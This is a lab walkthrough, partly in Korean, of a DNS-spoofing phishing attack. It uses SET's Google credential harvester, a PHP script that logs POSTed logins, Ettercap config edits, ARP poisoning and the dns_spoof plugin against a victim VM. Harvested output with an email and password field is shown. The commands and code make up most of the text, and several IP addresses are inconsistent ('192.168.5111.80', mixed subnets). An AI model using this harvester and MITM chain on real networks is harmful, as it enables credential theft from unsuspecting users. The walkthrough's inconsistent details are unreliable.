Sniffing - DNS - Ettercap.dns

 

Victim System	Attacker system
Windows 7 sp 1 (VMware)	Kali linux 2019  (VMware)

 

Victim System	Attacker system
192.168.5111.80	192.168.111.100
NAT NIC	NAT NIC

 

On Kali linux 2019

Verify ip address root@kali ~# ip address show eth0   Execute setoolkit root@kali ~# setoolkit 1) Social-Engineering Attacks 2) Website Attack Vectors 3) Credential Harvester Attack Method 1) Web Templates Enter kali linux ip address 192.168.111.100   Choose number 2 2. Google     Open the new other termianl Edit a post.php file by vi # vi /var/www/html/post.php <?php $file = 'harvester_2019.txt'; file_put_contents($file, print_r($_POST, true), FILE_APPEND); ?> <meta http-equiv="refresh" content="0; url=https://www.google.com" />    Modify the etter.conf # vi /etc/ettercap/etter.conf ec_gid = 0              # nobody is the default ec_gid = 0                # nobody is the default   # if you use iptables:    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"     Add those lines at the etter.dns file # vi /etc/ettercap/etter.dns *.google.co.kr  A       192.168.58.200   Execute ettercap with graphics mode  # ettercap -G   Sniff > Unfied snffing> eth0 Hosts > Scan for hosts Hosts > Hosts list   192.168.58.100(Victim) > Add to target 1 192.168.58.254(Gateway) > Add to target 2   Mitm > ARP poisioning > Sniff remote connections.   Plugins > Manage the plugins > dns_spoof double click     victim에서 C:\Users\Administrator>arp -a 인터페이스: 192.168.111.100 --- 0xb   인터넷 주소           물리적 주소           유형   192.168.111.53         50-b7-c3-a6-1f-05     동적   192.168.111.100        00-0c-29-a6-b1-72     동적   192.168.111.2        00-0c-29-a6-b1-72     동적    Do flush the Name cache table # ipconfg /flushdns # cmd # start http://www.google.co.kr     Back to the console on Kali linux ('Array\n',) ('(\n',) ('    [GALX] => SJLCkfgaqoM\n',) ('    [continue] => https://accounts.google.com/o/oauth2/auth?zt=ChRsWFBwd2JmV1hIcDhtUFdldzBENhIfVWsxSTdNLW9MdThibW1TMFQzVUZFc1BBaURuWmlRSQ%E2%88%99APsBz4gAAAAAUy4_qD7Hbfz38w8kxnaNouLcRiD3YTjX\n',) ('    [service] => lso\n',) ('    [dsh] => -7381887106725792428\n',) ('    [_utf8] => \xe2\x98\x83\n',) ('    [bgresponse] => js_disabled\n',) ('    [pstMsg] => 1\n',) ('    [dnConn] => \n',) ('    [checkConnection] => \n',) ('    [checkedDomains] => youtube\n',) ('    [Email] => SaveTheEarth\n',) ('    [Passwd] => weacnmadeit!s\n',) ('    [signIn] => Sign in\n',) ('    [PersistentCookie] => yes\n',) (')\n',)     root@kali:/var/www/html# cat harvester_2017-09-22\ 20\:39\:55.034333.txt Array (     [GALX] => SJLCkfgaqoM     [continue] => https://accounts.google.com/o/oauth2/auth?zt=ChRsWFBwd2JmV1hIcDhtUFdldzBENhIfVWsxSTdNLW9MdThibW1TMFQzVUZFc1BBaURuWmlRSQ%E2%88%99APsBz4gAAAAAUy4_qD7Hbfz38w8kxnaNouLcRiD3YTjX     [service] => lso     [dsh] => -7381887106725792428     [_utf8] => ☃     [bgresponse] => js_disabled     [pstMsg] => 1     [dnConn] =>     [checkConnection] =>     [checkedDomains] => youtube     [Email] => SaveTheEarth     [Passwd] => weacnmadeit!s     [signIn] => Sign in     [PersistentCookie] => yes )